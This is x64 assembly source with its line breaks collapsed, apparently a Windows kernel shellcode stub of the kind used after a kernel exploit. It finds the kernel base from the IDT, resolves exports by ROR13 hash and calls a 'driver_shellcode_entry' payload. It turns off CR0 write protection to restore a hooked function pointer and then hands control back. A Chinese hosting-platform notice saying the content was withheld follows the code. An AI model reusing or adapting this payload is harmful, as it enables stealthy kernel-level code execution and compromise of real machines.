extern driver_shellcode_entry:PROC.CODEmain PROCjmp main_startdata_orig_fnptr dq 0000000000000000hdata_orig_fnptrcode dq 0000000000000000hkernelbase dq 0000000000000000hone_second dq 0FFFFFFFFFF676980hmain_start:PUSH rcxPUSH rdxPUSH r8PUSH r9PUSH rbxPUSH rsiPUSH rdiPUSH r10PUSH r11PUSH r12PUSH r13PUSH rsiMOV rsi, rspAND rsp, 0FFFFFFFFFFFFFFF0hSUB rsp, 020hSIDT [rsp]mov r11, rcx ;小心提防WorkItemMOV rcx, [rsp+2]MOV rcx, [rcx+4]CALL PEGetModuleFromAddress_ScanBackMOV r12, raxsub rsp,40hmov rdx,r11mov rcx,[kernelbase]test rcx,rcxjnz doentrymov rcx,r12doentry:mov r12,rcxcall driver_shellcode_entryadd rsp,40hMOV rax, [data_orig_fnptrcode]MOV rcx, [data_orig_fnptr]test rax,raxjz loop_for_ever2mov r8,cr0and r8,0fffeffffhmov cr0,r8MOV [rcx], raxmov r8,cr0or r8, 010000hmov cr0,r8MOV rsp, rsiPOP rsiPOP r13POP r12POP r11POP r10POP rdiPOP rsiPOP rbxPOP r9POP r8POP rdxPOP rcxMOV rax, [data_orig_fnptr]JMP raxloop_for_ever2:test rcx,rcxjnz loop_for_ever;rcx!=0,rax=0,loop for ever,rcx=rax=0,retMOV rsp, rsiPOP rsiPOP r13POP r12POP r11POP r10POP rdiPOP rsiPOP rbxPOP r9POP r8POP rdxPOP rcxmov RAX,0C0000001hRETloop_for_ever:mov edx,58586d92hmov rcx,r12call PEGetProcAddressH_asmmov r13,raxloop_1:sub rsp,40hmov rcx,0mov rdx,0lea r8,[one_second]mov rax,0FFFFFFFFFF676980hmov [r8],raxcall r13add rsp,40hjmp loop_1main ENDP; ----------------------------------------------------; Search for PE header given an address. May cause page faults.; rcx -> scan address; rax <- header address; ----------------------------------------------------PEGetModuleFromAddress_ScanBack PROCSHR rcx, 12SHL rcx, 12address_loop:MOV eax, 1000hSUB rcx, raxMOV ax, [rcx] ; dos header magicCMP ax, 5a4dhJNE address_loopMOV eax, [rcx+60] ; nt header address offsetCMP eax, 1000hJNBE address_loopADD rax, rcx ; nt header addressMOV eax, [rax]CMP eax, 00004550h ; nt header magicJNE address_loopMOV rax, rcxRETPEGetModuleFromAddress_ScanBack ENDP; ----------------------------------------------------; Perform ROR13 hashing; rcx -> string ptr; rax <- result; ----------------------------------------------------HashROR13A_asm PROCPUSH rsiPUSH rdiMOV rsi, rcxXOR rdi, rdiXOR rax, raxCLDhash_loop:LODSBTEST al, alJZ hash_loop_finishROR edi, 13ADD edi, eaxJMP hash_loophash_loop_finish:MOV eax, ediPOP rdiPOP rsiRETHashROR13A_asm ENDP; rcx -> module base address; rdx -> hash of exported function; rax <- address of exported functionPEGetProcAddressH_asm PROC; rdi = PIMAGE_EXPORT_DIRECTORY; rsi = counter NumberOfNamesPUSH rdiPUSH rsiMOV edi, [rcx+60] ; nt header address offsetMOV edi, [rdi+rcx+136]ADD rdi, rcx ; ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModuleMOV r8d, [rdi+24] ; PIMAGE_EXPORT_DIRECTORY->NumberOfNamesXOR rsi, rsifind_loop:MOV eax, [rdi+32] ; PIMAGE_EXPORT_DIRECTORY->AddressOfNamesADD rax, rcx ; PIMAGE_EXPORT_DIRECTORY->AddressOfNames + hModuleMOV eax, [rax+rsi*4] ; AddressOfNames[index]ADD rax, rcxPUSH rcxMOV rcx, raxCALL HashROR13A_asmPOP rcxCMP eax, edxJE find_loop_foundINC rsiJMP find_loopfind_loop_found:; found!MOV edx, [rdi+36] ; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinalsADD rdx, rcx ; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals + hModuleXOR rax, raxMOV ax, [rdx+rsi*2] ; AddressOfNameOrdinals[index]MOV edx, [rdi+28] ; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctionsADD rdx, rcx ; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions + hModuleMOV eax, [rdx+rax*4] ; AddressOfFunctions[index]ADD rax, rcx ; AddressOfFunctions[index] + hModulePOP rsiPOP rdiRETPEGetProcAddressH_asm ENDPGetCR3 PROCMOV rax, cr3RETGetCR3 ENDP; ----------------------------------------------------; Flush the CPU cache.; ----------------------------------------------------CacheFlush PROCWBINVDRETCacheFlush ENDP__chkstk PROC publicRET__chkstk ENDPEND
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。